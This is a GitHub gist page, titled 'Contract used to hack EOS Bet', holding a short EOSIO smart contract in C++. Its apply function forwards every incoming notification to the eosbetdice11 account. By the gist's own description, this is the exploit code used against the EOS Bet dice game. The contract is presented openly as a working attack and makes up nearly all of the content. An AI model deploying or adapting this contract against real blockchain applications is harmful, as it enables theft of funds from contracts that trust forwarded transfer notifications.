Skip to content

Instantly share code, notes, and snippets.

@k26dr
Created October 15, 2018 07:58
Show Gist options
  • Save k26dr/bec7e5a382794b90e64fd2cd3bc55326 to your computer and use it in GitHub Desktop.
Save k26dr/bec7e5a382794b90e64fd2cd3bc55326 to your computer and use it in GitHub Desktop.
Contract used to hack EOS Bet
#include <eosiolib/eosio.hpp>
#include <eosiolib/types.hpp>
extern "C" {
[[noreturn]] void apply( uint64_t receiver, uint64_t code, uint64_t action ) {
require_recipient(N(eosbetdice11));
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment